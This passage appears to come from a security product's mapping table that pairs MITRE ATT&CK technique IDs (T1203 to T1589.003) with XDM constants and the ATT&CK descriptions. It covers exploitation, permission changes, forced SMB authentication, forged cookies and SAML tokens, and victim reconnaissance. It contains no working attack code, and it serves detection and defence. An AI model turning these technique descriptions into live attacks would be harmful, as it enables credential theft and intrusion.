be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been
delivered as objects within Microsoft Office documents. https://attack.mitre.org/techniques/T1203

T1212 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_FOR_CREDENTIAL_ACCESS Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a
software vulnerability occurs when an adversary takes advantage of a programming error in a program,
service, or within the operating system software or kernel itself to execute adversary-controlled
code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a
means to gain access to useful credentials or circumvent the process to gain access to systems. One
example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using
domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets)
Exploitation for credential access may also result in Privilege Escalation depending on the process targeted
or credentials obtained. https://attack.mitre.org/techniques/T1212

T1211 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_FOR_DEFENSE_EVASION Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a
software vulnerability occurs when an adversary takes advantage of a programming error in a program,
service, or within the operating system software or kernel itself to execute adversary-controlled
code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent
them. Adversaries may have prior knowledge through reconnaissance that security software exists within
an environment or they may perform checks during or shortly after the system is compromised for [Security
Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be
targeted directly for exploitation. There are examples of antivirus software being targeted by persistent
threat groups to avoid detection. https://attack.mitre.org/techniques/T1211

T1068 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_FOR_PRIVILEGE_ESCALATION Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a
software vulnerability occurs when an adversary takes advantage of a programming error in a program,
service, or within the operating system software or kernel itself to execute adversary-controlled code.
Security constructs such as permission levels will often hinder access to information and use of certain
techniques, so adversaries will likely need to perform privilege escalation to include use of software
exploitation to circumvent those restrictions. When initially gaining access to a system, an adversary may
be operating within a lower privileged process which will prevent them from accessing certain resources on
the system. Vulnerabilities may exist, usually in operating system components and software commonly
running at higher permissions, that can be exploited to gain higher levels of access on the system. This
could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions
depending on the component that is vulnerable. This could also enable an adversary to move from a
virtualized environment, such as within a virtual machine or container, onto the underlying host. This may
be a necessary step for an adversary compromising an endpoint system that has been properly configured
and limits other privilege escalation methods. Adversaries may bring a signed vulnerable driver onto a
compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This
process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole
June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files
delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://
attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).
https://attack.mitre.org/techniques/T1068

T1210 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_OF_REMOTE_SERVICES Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a
network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a
programming error in a program, service, or within the operating system software or kernel itself to execute
adversary-controlled code. A common goal for post-compromise exploitation of remote services is for
lateral movement to enable access to a remote system. An adversary may need to determine if the remote
system is in a vulnerable state, which may be done through [Network Service Scanning](https://
attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software
that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security
software that may be used to detect or contain remote exploitation. Servers are likely a high value target for
lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or
access to additional resources. There are several well-known vulnerabilities that exist in common services
such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well
as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662)
and web server services. (Citation: NVD CVE-2014-7169) Depending on the permissions level of the
vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://
attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. https://
attack.mitre.org/techniques/T1210

T1133 XDM_CONST.MITRE_TECHNIQUE_EXTERNAL_REMOTE_SERVICES Adversaries may leverage external-facing remote services to initially access and/or persist within a network.
Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal
enterprise network resources from external locations. There are often remote service gateways that
manage connections and credential authentication for these services. Services such as [Windows Remote
Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/
T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop) Access to
[Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which
could be obtained through credential pharming or by obtaining the credentials from users after
compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote
services may be used as a redundant or persistent access mechanism during an operation. Access may
also be gained through an exposed service that doesn’t require authentication. In containerized
environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application
such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42
Hildegard Malware) https://attack.mitre.org/techniques/T1133

T1008 XDM_CONST.MITRE_TECHNIQUE_FALLBACK_CHANNELS Adversaries may use fallback or alternate communication channels if the primary channel is compromised
or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.
https://attack.mitre.org/techniques/T1008

T1083 XDM_CONST.MITRE_TECHNIQUE_FILE_AND_DIRECTORY_DISCOVERY Adversaries may enumerate files and directories or may search in specific locations of a host or network
share for certain information within a file system. Adversaries may use the information from [File and
Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-
on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find,
and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and
directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). https://
attack.mitre.org/techniques/T1083
Original Mapped Description

T1222 XDM_CONST.MITRE_TECHNIQUE_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and
access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May
2018) File and directory permissions are commonly managed by ACLs configured by the file or directory
owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform,
but generally explicitly designate which users or groups can perform which actions (read, write, execute,
etc.). Modifications may include changing specific access rights, which may require taking ownership of a
file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This
may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific
file and directory modifications may be a required step for many techniques, such as establishing
Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon
Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification]
(https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration
files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). https://attack.mitre.org/
techniques/T1222

T1222.002 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION_LINUX_AND_MAC_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and
access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May
2018) File and directory permissions are commonly managed by ACLs configured by the file or directory
owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform,
but generally explicitly designate which users or groups can perform which actions (read, write, execute,
etc.). Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and
other) and a standard set of permissions (read, write, and execute) that are applied to each group. While
nuances of each platform’s permissions implementation may vary, most of the platforms provide two
primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod
(short for change mode). Adversarial may use these commands to make themselves the owner of files and
directories or change the mode if current permissions allow it. They could subsequently lock others out of
the file. Specific file and directory modifications may be a required step for many techniques, such as
establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/
T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow]
(https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) https://
attack.mitre.org/techniques/T1222/002

T1222.001 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION_WINDOWS_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and
access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May
2018) File and directory permissions are commonly managed by ACLs configured by the file or directory
owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform,
but generally explicitly designate which users or groups can perform which actions (read, write, execute,
etc.). Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation:
Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or
denied access to a securable object. When an attempt is made to access a securable object, the system
checks the access control entries in the DACL in order. If a matching entry is found, access to the object is
granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018) Adversaries can
interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`,
which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://
attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and
directory DACLs. Specific file and directory modifications may be a required step for many techniques, such
as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008),
[Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other
instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/
T1574). https://attack.mitre.org/techniques/T1222/001

T1495 XDM_CONST.MITRE_TECHNIQUE_FIRMWARE_CORRUPTION Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in
devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec
Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on
hardware devices in order to initialize and manage device functionality. These devices could include the
motherboard, hard drive, or video cards. https://attack.mitre.org/techniques/T1495

T1187 XDM_CONST.MITRE_TECHNIQUE_FORCED_AUTHENTICATION Adversaries may gather credential material by invoking or forcing a user to automatically provide
authentication information through a mechanism in which they can intercept. The Server Message Block
(SMB) protocol is commonly used in Windows networks for authentication and communication between
systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB
resource it will automatically attempt to authenticate and send credential information for the current user to
the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise
environments so that users do not need to enter credentials to access network resources. Web Distributed
Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when
SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and
443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
Adversaries may take advantage of this behavior to gain access to user account hashes through forced
SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that
contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://
attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged
accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s).
When the user's system accesses the untrusted resource it will attempt authentication and send
information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation:
GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force]
(https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation:
Cylance Redirect to SMB) There are several different ways this can occur. (Citation: Osanda Stealing
NetNTLM Hashes) Some specifics from in-the-wild use include: * A spearphishing attachment containing a
document with a resource that is automatically loaded when the document is opened (i.e. [Template
Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request
similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT
APT Energy Oct 2017) * A modified .LNK or .SCF file with the icon filename pointing to an external
reference such as \\[remote address]\pic.png that will force the system to load the resource when the
icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017) https://
attack.mitre.org/techniques/T1187

T1606 XDM_CONST.MITRE_TECHNIQUE_FORGE_WEB_CREDENTIALS Adversaries may forge credential materials that can be used to gain access to web applications or Internet
services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often
use session cookies, tokens, or other materials to authenticate and authorize user access. Adversaries may
generate these credential materials in order to gain access to web resources. This differs from [Steal Web
Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://
attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged
by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials
often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/
T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Once
forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication
Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other
authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies
January 2019)(Citation: Microsoft SolarWinds Customer Guidance) https://attack.mitre.org/techniques/
T1606

T1606.002 XDM_CONST.MITRE_TECHNIQUE_FORGE_WEB_CREDENTIALS_SAML_TOKENS An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid
SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token
is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime in a
LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable
adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.
(Citation: Cyberark Golden SAML) An adversary may utilize [Private Keys](https://attack.mitre.org/
techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML
tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active
Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing
certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access
Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new
and forged by the adversary, rather than stolen or intercepted from legitimate users. An adversary may gain
administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged
account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/
T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft
SolarWinds Customer Guidance) https://attack.mitre.org/techniques/T1606/002
Original Mapped Description

T1606.001 XDM_CONST.MITRE_TECHNIQUE_FORGE_WEB_CREDENTIALS_WEB_COOKIES Adversaries may forge web cookies that can be used to gain access to web applications or Internet
services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often
use session cookies to authenticate and authorize user access. Adversaries may generate these cookies in
order to gain access to web resources. This differs from [Steal Web Session Cookie](https://
attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by
the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have
standardized and documented cookie values that can be generated using provided tools or interfaces.
(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as
passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed
values. Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie]
(https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication
protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac
Crypto Cookies January 2019) https://attack.mitre.org/techniques/T1606/001

T1592 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION Adversaries may gather information about the victim's hosts that can be used during targeting. Information
about hosts may include a variety of details, including administrative data (ex: name, assigned IP,
functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active
Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/
techniques/T1598). Adversaries may also compromise sites then include malicious content designed to
collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed
to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/
techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open
Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases]
(https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities]
(https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/
T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or
[External Remote Services](https://attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/
T1592

T1592.004 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION_CLIENT_CONFIGURATIONS Adversaries may gather information about the victim's client configurations that can be used during
targeting. Information about client configurations may include a variety of details and settings, including
operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
Adversaries may gather this information in various ways, such as direct collection actions via [Active
Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent
strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also
compromise sites then include malicious content designed to collect host information from visitors.(Citation:
ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or
other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase
invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex:
[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical
Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop
Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/
techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/
techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). https://
attack.mitre.org/techniques/T1592/004

T1592.003 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION_FIRMWARE Adversaries may gather information about the victim's host firmware that can be used during targeting.
Information about host firmware may include a variety of details such as type and versions on specific
hosts, which may be used to infer more information about hosts in the environment (ex: configuration,
purpose, age/patch level, etc.). Adversaries may gather this information in various ways, such as direct
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host
firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings,
network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering
this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/
Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://
attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://
attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/
or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit
Public-Facing Application](https://attack.mitre.org/techniques/T1190)). https://attack.mitre.org/techniques/
T1592/003

T1592.001 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION_HARDWARE Adversaries may gather information about the victim's host hardware that can be used during targeting.
Information about hardware infrastructure may include a variety of details such as types and versions on
specific hosts, as well as the presence of additional components that might be indicative of added
defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.). Adversaries may
gather this information in various ways, such as direct collection actions via [Active Scanning](https://
attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for
Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then
include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox)
Information about the hardware infrastructure may also be exposed to adversaries via online or other
accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open
Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases]
(https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities]
(https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/
T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/
techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)). https://
attack.mitre.org/techniques/T1592/001

T1592.002 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION_SOFTWARE Adversaries may gather information about the victim's host software that can be used during targeting.
Information about installed software may include a variety of details such as types and versions on specific
hosts, as well as the presence of additional components that might be indicative of added defensive
protections (ex: antivirus, SIEMs, etc.). Adversaries may gather this information in various ways, such as
direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports,
server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then include malicious content designed to collect host information
from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to
adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports,
resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of
reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or
[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational
resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities]
(https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise]
(https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/
techniques/T1133)). https://attack.mitre.org/techniques/T1592/002

T1589 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_IDENTITY_INFORMATION Adversaries may gather information about the victim's identity that can be used during targeting.
Information about identities may include a variety of details, including personal data (ex: employee names,
email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this
information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/
techniques/T1598). Information about victims may also be exposed to adversaries via online or other
accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-
Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register
Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal
opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://
attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://
attack.mitre.org/techniques/T1078)). https://attack.mitre.org/techniques/T1589
Original Mapped Description

T1589.001 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_IDENTITY_INFORMATION_CREDENTIALS Adversaries may gather credentials that can be used during targeting. Account credentials gathered by
adversaries may be those directly associated with the target victim organization or attempt to take
advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via
[Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise
sites then include malicious content designed to collect website authentication cookies from visitors.
(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or
other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach
dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation:
CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering
this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/
Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/
techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://
attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://
attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). https://
attack.mitre.org/techniques/T1589/001

T1589.002 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_IDENTITY_INFORMATION_EMAIL_ADDRESSES Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist,
organizations may have public-facing email infrastructure and addresses for employees. Adversaries may
easily gather email addresses, since they may be readily available and exposed via online or other
accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-
Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET
Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search
Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://
attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://
attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/
techniques/T1566)). https://attack.mitre.org/techniques/T1589/002

T1589.003 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_IDENTITY_INFORMATION_EMPLOYEE_NAMES Adversaries may gather employee names that can be used during targeting. Employee names be used to
derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable
lures. Adversaries may easily gather employee names, since they may be readily available and exposed
via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001)
or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open
Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://
attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts]
(https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/
techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). https://attack.mitre.org/
techniques/T1589/003

